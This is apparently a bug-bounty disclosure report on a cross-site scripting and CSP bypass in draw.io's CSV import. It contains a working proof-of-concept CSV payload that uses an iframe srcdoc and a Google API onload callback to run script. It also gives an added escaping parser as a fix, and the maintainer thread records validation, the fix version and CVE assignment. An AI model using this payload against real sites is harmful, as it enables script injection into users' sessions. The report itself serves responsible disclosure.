Cross-site Scripting and CSP Bypass in app.diagrams.net in jgraph/drawio

Status: Valid

Reported on May 4th 2023


Description

The application allows the user to import a CSV template into the diagram, but does not sanitize the column values, so any JavaScript embedded in a cell is executed.

Proof of Concept

##
## Example CSV import. Use ## for comments and # for configuration. Paste CSV below.
## The following names are reserved and should not be used (or ignored):
## id, tooltip, placeholder(s), link and label (see below)
##
# connect: {"from": "manager", "to": "name", "invert": true, "label": "manages", \
#          "style": "curved=1;endArrow=blockThin;endFill=1;fontSize=11;"}
# connect: {"from": "refs", "to": "id", "style": "curved=1;fontSize=11;"}
# layout: auto
#
## ---- CSV below this line. First line are column names. ----
name,position,id,location,manager,email,fill,stroke,refs,url,image
Tessa Miller'"><iframe srcdoc='<script src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz&#x22;-alert(document.domain)-&#x22;></script>'>,CFO,emi,Office 1,,me@example.com,default,#6c8ebf,,https://www.draw.io,https://cdn3.iconfinder.com/data/icons/user-avatars-1/512/users-3-128.png

Steps to reproduce

Click the Insert button -> Advanced -> CSV -> paste the payload above -> the XSS is triggered
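The missing sanitization is the root cause described above. As an added defensive illustration (code written for this report, not drawio's own importer), the following parses the CSV import format shown in the proof of concept (## comment lines, # config lines with "\" continuation, a header line, then data rows) and HTML-escapes every cell before it could be placed in a label, so markup in a cell is rendered as inert text. The sample input, the names parseCsvImport and escapeHtml, and the simplification that cells contain no quoted commas are assumptions made here.

```javascript
// Added example (not drawio's own importer): parse a draw.io-style CSV import,
// where "##" lines are comments, "#" lines are config (with "\" continuation),
// then a header line and data rows, and HTML-escape every cell before it is
// used in a label, so markup in a cell renders as inert text.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Returns { config: { key: value }, rows: [ { column: escapedCell } ] }.
// Assumption: no quoted commas inside cells (true of the report's sample).
function parseCsvImport(text) {
  const config = {};
  const rows = [];
  let header = null;
  const lines = text.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    let line = lines[i];
    if (line.startsWith('##') || line.trim() === '') continue; // comment / blank
    if (line.startsWith('#')) {                                  // config line
      // Join "\"-continued lines, dropping the leading "#" of each continuation.
      while (line.endsWith('\\') && i + 1 < lines.length) {
        line = line.slice(0, -1) + lines[++i].replace(/^#\s*/, ' ');
      }
      const m = /^#\s*([A-Za-z]+):\s*(.*)$/.exec(line);
      if (m) config[m[1]] = m[2].trim();
      continue;
    }
    const cells = line.split(',');
    if (header === null) { header = cells; continue; }          // column names
    const row = {};
    header.forEach((col, j) => { row[col] = escapeHtml(cells[j] ?? ''); });
    rows.push(row);
  }
  return { config, rows };
}

// Constructed sample input: one cell carries markup and quotes, as in the report.
const SAMPLE = [
  '## comment line',
  '# layout: auto',
  '# connect: {"from": "manager", "to": "name", \\',
  '#          "label": "manages"}',
  'name,position,manager',
  'Tessa Miller\'"><iframe srcdoc=\'x\'>,CFO,',
].join('\n');

const parsed = parseCsvImport(SAMPLE); // parsed.rows[0].name holds only escaped text
```

Escaping at import time means the page's CSP allowlist is no longer the only barrier between a cell value and script execution.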

Evidence

PoC

Impact

XSS, in some cases it is possible to rce on the desktop app.

We are processing your report and will contact the jgraph/drawio team within 24 hours.
7 months ago
Nhien.IT
7 months ago

Researcher


Public link: PoC

Nhien.IT
7 months ago

Researcher


Hi,

If the public link doesn't trigger XSS after the first time, please refresh the URL again.

Thanks!

David Benson
7 months ago

Maintainer


Hi, thanks for the report. The base report is certainly valid. Could you just clarify a few things please:

"in some cases it is possible to rce on the desktop app." That would be a serious issue, but you must provide a PoC.

Looking at the severity, https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Why is the availability marked as low? How does this affect the service availability?

Nhien.IT modified the report
7 months ago
Nhien.IT
7 months ago

Researcher


Hi,

As in previous reports I see that some other researchers can abuse this vulnerability to upgrade to RCE but I haven't found a way to exploit it yet.

As for severity, I'm a bit confused that availability is None. I just updated!

Thank you for this incident!

David Benson validated this vulnerability 7 months ago

Thanks. We haven't managed to recreate the problem in the desktop version to date.

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nhien.IT
7 months ago

Researcher


Thanks @maintainer

David Benson marked this as fixed in 21.2.8 with commit c7ac63 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jun 1st 2023
David Benson published this vulnerability 6 months ago